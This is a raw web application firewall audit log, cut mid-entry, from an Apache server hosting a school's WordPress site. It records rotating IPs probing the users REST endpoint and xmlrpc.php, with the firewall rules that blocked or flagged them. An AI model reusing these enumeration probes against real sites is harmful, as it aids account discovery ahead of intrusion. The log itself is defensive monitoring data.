userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424012648477 4612 (- - -) Stopwatch2: 1747424012648477 4612; combined=3574, p1=435, p2=2940, p3=23, p4=24, p5=89, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dc18834-Z-- --84949168-A-- [17/May/2025:02:34:11 +0700] aCeTM9hEtho3ciA0wehdpwAAAJA 103.236.140.4 53992 103.236.140.4 8181 --84949168-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --84949168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84949168-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424051382594 3296 (- - -) Stopwatch2: 1747424051382594 3296; combined=1403, p1=481, p2=881, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84949168-Z-- --e6d27a7b-A-- [17/May/2025:02:34:17 +0700] aCeTOEE0LfP59mkCzg416wAAANM 103.236.140.4 53996 103.236.140.4 8181 --e6d27a7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e6d27a7b-C-- demo.sayHello --e6d27a7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6d27a7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424056995599 5385 (- - -) Stopwatch2: 1747424056995599 5385; combined=4080, p1=497, p2=3370, p3=28, p4=32, p5=90, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6d27a7b-Z-- --927ce728-A-- [17/May/2025:02:34:39 +0700] aCeTT9hEtho3ciA0wehdqQAAAIg 103.236.140.4 54000 103.236.140.4 8181 --927ce728-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --927ce728-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --927ce728-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424079478947 3346 (- - -) Stopwatch2: 1747424079478947 3346; combined=1480, p1=515, p2=933, p3=0, p4=0, p5=32, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --927ce728-Z-- --a496ff13-A-- [17/May/2025:02:34:41 +0700] aCeTUUE0LfP59mkCzg417AAAANA 103.236.140.4 54004 103.236.140.4 8181 --a496ff13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a496ff13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a496ff13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424081778590 2142 (- - -) Stopwatch2: 1747424081778590 2142; combined=1051, p1=347, p2=677, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a496ff13-Z-- --2cffa82a-A-- [17/May/2025:02:34:43 +0700] aCeTU9hEtho3ciA0wehdqwAAAJM 103.236.140.4 54006 103.236.140.4 8181 --2cffa82a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2cffa82a-C-- demo.sayHello --2cffa82a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2cffa82a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424083682409 6816 (- - -) Stopwatch2: 1747424083682409 6816; combined=4830, p1=599, p2=3984, p3=36, p4=40, p5=101, sr=80, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cffa82a-Z-- --d1424364-A-- [17/May/2025:02:34:48 +0700] aCeTWNhEtho3ciA0wehdrQAAAJU 103.236.140.4 54012 103.236.140.4 8181 --d1424364-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d1424364-C-- demo.sayHello --d1424364-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1424364-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424088488895 5092 (- - -) Stopwatch2: 1747424088488895 5092; combined=3821, p1=502, p2=3110, p3=24, p4=27, p5=92, sr=85, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1424364-Z-- --b20f8a47-A-- [17/May/2025:02:35:18 +0700] aCeTdkE0LfP59mkCzg417gAAAM4 103.236.140.4 54016 103.236.140.4 8181 --b20f8a47-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b20f8a47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b20f8a47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424118203591 3466 (- - -) Stopwatch2: 1747424118203591 3466; combined=1441, p1=492, p2=912, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b20f8a47-Z-- --23dfa607-A-- [17/May/2025:02:35:26 +0700] aCeTfkE0LfP59mkCzg417wAAAMI 103.236.140.4 54020 103.236.140.4 8181 --23dfa607-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23dfa607-C-- demo.sayHello --23dfa607-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23dfa607-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424126284167 5952 (- - -) Stopwatch2: 1747424126284167 5952; combined=4274, p1=539, p2=3508, p3=29, p4=31, p5=97, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23dfa607-Z-- --dbe4892d-A-- [17/May/2025:02:35:36 +0700] aCeTiNhEtho3ciA0wehdsAAAAJQ 103.236.140.4 54024 103.236.140.4 8181 --dbe4892d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dbe4892d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbe4892d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424136041568 2983 (- - -) Stopwatch2: 1747424136041568 2983; combined=1321, p1=436, p2=850, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbe4892d-Z-- --fffc1b06-A-- [17/May/2025:02:35:39 +0700] aCeTi9hEtho3ciA0wehdsgAAAJg 103.236.140.4 54028 103.236.140.4 8181 --fffc1b06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fffc1b06-C-- demo.sayHello --fffc1b06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fffc1b06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424139560572 5463 (- - -) Stopwatch2: 1747424139560572 5463; combined=4088, p1=532, p2=3335, p3=31, p4=33, p5=93, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fffc1b06-Z-- --9bce6805-A-- [17/May/2025:02:37:44 +0700] aCeUCNhEtho3ciA0wehdtQAAAIU 103.236.140.4 54042 103.236.140.4 8181 --9bce6805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9bce6805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bce6805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424264030832 2814 (- - -) Stopwatch2: 1747424264030832 2814; combined=1278, p1=447, p2=800, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bce6805-Z-- --afee6c41-A-- [17/May/2025:02:37:52 +0700] aCeUENhEtho3ciA0wehdtwAAAIk 103.236.140.4 54046 103.236.140.4 8181 --afee6c41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afee6c41-C-- demo.sayHello --afee6c41-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afee6c41-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424272767280 3363 (- - -) Stopwatch2: 1747424272767280 3363; combined=2492, p1=313, p2=1994, p3=18, p4=62, p5=61, sr=43, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afee6c41-Z-- --4620d243-A-- [17/May/2025:02:39:15 +0700] aCeUY8e47ocjCGWTS4Y-7gAAAEU 103.236.140.4 54058 103.236.140.4 8181 --4620d243-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4620d243-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4620d243-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424355437679 2878 (- - -) Stopwatch2: 1747424355437679 2878; combined=1330, p1=432, p2=867, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4620d243-Z-- --a923235f-A-- [17/May/2025:02:39:21 +0700] aCeUadhEtho3ciA0wehduwAAAIg 103.236.140.4 54062 103.236.140.4 8181 --a923235f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a923235f-C-- demo.sayHello --a923235f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a923235f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424361283579 4946 (- - -) Stopwatch2: 1747424361283579 4946; combined=3804, p1=467, p2=3086, p3=23, p4=26, p5=120, sr=68, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a923235f-Z-- --5eef5d0a-A-- [17/May/2025:02:39:59 +0700] aCeUj8e47ocjCGWTS4Y-7wAAAEQ 103.236.140.4 54066 103.236.140.4 8181 --5eef5d0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5eef5d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eef5d0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424399786882 3061 (- - -) Stopwatch2: 1747424399786882 3061; combined=1331, p1=444, p2=858, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eef5d0a-Z-- --6acc2f28-A-- [17/May/2025:02:40:04 +0700] aCeUlNhEtho3ciA0wehdvgAAAJM 103.236.140.4 54070 103.236.140.4 8181 --6acc2f28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6acc2f28-C-- demo.sayHello --6acc2f28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6acc2f28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424404447214 6770 (- - -) Stopwatch2: 1747424404447214 6770; combined=4746, p1=614, p2=3882, p3=37, p4=43, p5=101, sr=84, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
